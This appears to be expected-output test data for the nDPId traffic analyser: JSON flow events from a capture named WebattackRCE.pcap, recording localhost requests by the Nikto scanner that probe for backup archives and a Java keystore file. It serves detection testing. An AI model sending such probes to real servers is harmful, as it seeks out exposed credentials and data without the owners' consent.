00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_packet_id":1,"flow_last_seen":1576420277302,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277302,"pkt":"AAAAAAAAAAAAAAAACABFAADG+c1AAEAGQmJ\/AAABfwAAAcSiH5Dkc8Fn99puBYAYAED+ugAAAQEICp1m\/V6dZv1eR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":397,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277302,"flow_last_seen":1576420277302,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277302,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50338,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_packet_id":1,"flow_last_seen":1576420277304,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277304,"pkt":"AAAAAAAAAAAAAAAACABFAADGn2FAAEAGnM5\/AAABfwAAAcSkH5ABoKfybJgPqoAYAED+ugAAAQEICp1m\/WCdZv1gR0VUIC8xMjcwMDEudGFyLmJ6MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01060{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":398,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277304,"flow_last_seen":1576420277304,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277304,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50340,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_packet_id":1,"flow_last_seen":1576420277306,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277306,"pkt":"AAAAAAAAAAAAAAAACABFAADBq8lAAEAGkGt\/AAABfwAAAcSmH5B085NqCLeHfoAYAED+tQAAAQEICp1m\/WGdZv1hR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":399,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277306,"flow_last_seen":1576420277306,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277306,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50342,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_packet_id":1,"flow_last_seen":1576420277307,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277307,"pkt":"AAAAAAAAAAAAAAAACABFAADBE+BAAEAGKFV\/AAABfwAAAcSoH5A\/FCtx8eapa4AYAED+tQAAAQEICp1m\/WOdZv1jR0VUIC8xMjcwMC5qa3MgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277307,"flow_last_seen":1576420277307,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277307,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50344,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.jks","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_packet_id":1,"flow_last_seen":1576420277308,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277308,"pkt":"AAAAAAAAAAAAAAAACABFAADBd5tAAEAGxJl\/AAABfwAAAcSqH5Asxk83LE5RU4AYAED+tQAAAQEICp1m\/WSdZv1kR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":401,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":401,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277308,"flow_last_seen":1576420277308,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277308,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50346,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_packet_id":1,"flow_last_seen":1576420277309,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277309,"pkt":"AAAAAAAAAAAAAAAACABFAADB9HRAAEAGR8B\/AAABfwAAAcSsH5BlTMzeEpcpJ4AYAED+tQAAAQEICp1m\/WWdZv1lR0VUIC8xMjcwMC5lZ2cgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":402,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":402,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277309,"flow_last_seen":1576420277309,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277309,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50348,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_packet_id":1,"flow_last_seen":1576420277310,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277310,"pkt":"AAAAAAAAAAAAAAAACABFAADFcQdAAEAGyyl\/AAABfwAAAcSuH5C\/jUmrZ8IhxYAYAED+uQAAAQEICp1m\/WadZv1mR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":403,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":403,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277310,"flow_last_seen":1576420277310,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277310,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50350,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_packet_id":1,"flow_last_seen":1576420277311,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277311,"pkt":"AAAAAAAAAAAAAAAACABFAADFdZ1AAEAGxpN\/AAABfwAAAcSwH5BGIE0sZXhTqYAYAED+uQAAAQEICp1m\/WedZv1nR0VUIC8xMjdfMF8wXzEudGFyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="}
01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":404,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":404,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277311,"flow_last_seen":1576420277311,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277311,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50352,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.tar","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_packet_id":1,"flow_last_seen":1576420277313,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277313,"pkt":"AAAAAAAAAAAAAAAACABFAADESF9AAEAG89J\/AAABfwAAAcSyH5CXAnDudCS+HoAYAED+uAAAAQEICp1m\/WmdZv1oR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":405,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":405,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277313,"flow_last_seen":1576420277313,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277313,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50354,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_packet_id":1,"flow_last_seen":1576420277314,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277314,"pkt":"AAAAAAAAAAAAAAAACABFAADEBf5AAEAGNjR\/AAABfwAAAcS0H5ApMj1NA0MOSIAYAED+uAAAAQEICp1m\/WqdZv1qR0VUIC8xMjcwMC50YXIuZ3ogSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCg0K"}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":406,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":406,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277314,"flow_last_seen":1576420277314,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277314,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50356,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/12700.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_packet_id":1,"flow_last_seen":1576420277315,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277315,"pkt":"AAAAAAAAAAAAAAAACABFAADC35NAAEAGXKB\/AAABfwAAAcS2H5BI6+ciGxVy6IAYAED+tgAAAQEICp1m\/WudZv1rR0VUIC8xLnRhci5sem1hIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":407,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277315,"flow_last_seen":1576420277315,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277315,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50358,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.tar.lzma","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}}
